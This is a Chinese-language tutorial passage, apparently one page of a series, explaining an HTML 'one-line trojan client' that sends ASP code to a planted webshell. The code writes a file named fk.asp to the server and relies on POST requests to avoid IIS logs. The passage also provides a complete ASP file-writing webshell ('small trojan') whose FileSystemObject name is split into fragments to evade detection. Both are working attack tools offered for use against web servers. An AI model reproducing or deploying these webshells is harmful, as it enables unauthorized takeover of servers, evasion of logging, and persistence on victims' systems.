下面就带着大家一起分析一下上面的代码(html的一些最基本的知识就不做解释了)：

以下是代码片段： <title>一句话客户端</title>          显示在浏览器标题栏上面的文字，你可以自己更改 <style type="text/css"> <!-- body {         background-color: #FFFFFF;   背景颜色          } .lygf {         border: 1px solid #660099;   边框属性         font-size: 12px;             字体大小     } -->                                  本页面所要用到的样式 <form name="lygf" method=post>       创建一个form对象，其中name的作用是用作一个枢纽把我们要插入的马的内容传递给form，以post方式提交给下面的连接，而不是get，用post提交IIS是不记入日志的 <input name="add" type="text" id="add" size="97" value="http://">创建一个用于提交的输入框(text)用于写地址(add)，长度是97个字节，value=是默认的内容 <input type="submit" value="枫" onClick="this.form.action=this.form.add.value;">创建一个按钮用于提交(submit)，后面的部分是把上面value的值赋给form去post <input type="hidden" name="fk" id="fk" value="Execute("Session(""fk"")=request(""*""):Execute(Session(""fk""))")">通过建立一个隐藏域，把fk与下面name的值*关联，用session保存代码然后执行,这句借用了海洋的客户端，不过那样不怎么好用 <textarea name="*" cols="100" rows="9" width="45"> textarea就是论坛中的发言框。在HTML语言中，textarea、input都是属于“文本域”的

        set lP=server.createObject("Adodb.Stream") CreateObject创建并返回对 Automation 对象的引用，应用于Server 对象；Adodb.Stream是ADO的Stream对象,提供存取二进制数据或者文本流,从而实现对流的读、写和管理等操作；对象创建后，就可以在代码中使用定义的对象变量(IP)引用此对象
lP.Open 打开这个变量
lP.Type=2 Type 指定或返回的数据类型，这里是以文本方式
lP.CharSet="gb2312" gb2312是指简体中文
lP.writetext request("lygf") Request 对象在 HTTP 请求期间，检索客户端浏览器传递给服务器的值，这里是lygf，要和下面文本框中的name=lygf相对应，writetext允许对现有的 text、ntext 或 image 列执行最小日志记录的交互式更新。WRITETEXT 将覆盖受其影响的列中的所有现有数据，在这里的作用就是取得下面的文本框里的木马的内容
lP.SaveToFile server.mappath("fk.asp"),2 这句很好懂，就是以覆盖文件的方式向服务器的同文件目录下写入fk.asp
lP.Close 关闭对象变量
set lP=nothing 释放Adodb.Stream对象
response.redirect "fk.asp" 在这里起到转向作用，转到我们刚刚写入的fk.asp

<textarea name=lygf cols=120 rows=10 width=45>添入生成木马的内容</textarea>又创建一个文本框用于写马的内容，这里的name要和上面的一样

给大家提供一个小马：

以下是代码片段： <%dim objfso%> <%dim fdata%> <%dim objcountfile%> <%on error resume next%> <%set objfso = server.createobject("S"+"cr"+"ipt"+"ing"+".f"+"il"+"es"+"ys"+"tem"+"ob"+"jec"+"t")%> <%if trim(request("syfdpath"))<>"" then%> <%fdata = request("cyfddata")%> <%set objcountfile=objfso.createtextfile(request("syfdpath"),true)%> <%objcountfile.write fdata%> <%if err =0 then%> <%response.write "<font color=red>save success!</font>"%> <%else%> <%response.write "<font color=red>save unsuccess!</font>"%> <%end if%> <%err.clear%> <%end if%> <%objcountfile.close%> <%set objcountfile=nothing%> <%set objfso = nothing%> <%response.write "<form action='''' method=post>"%> <%response.write "<input type=text name=syfdpath width=32 size=50>"%> <%response.write "<br>"%> <%=server.mappath(request.servervariables("script_name"))%> <%response.write "<br>"%> <%response.write "<textarea name=cyfddata cols=80 rows=10 width=32></textarea>"%> <%response.write "<input type=submit value=go>"%> <%response.write "</form>"%>

上一页  [1] [2] [3] 下一页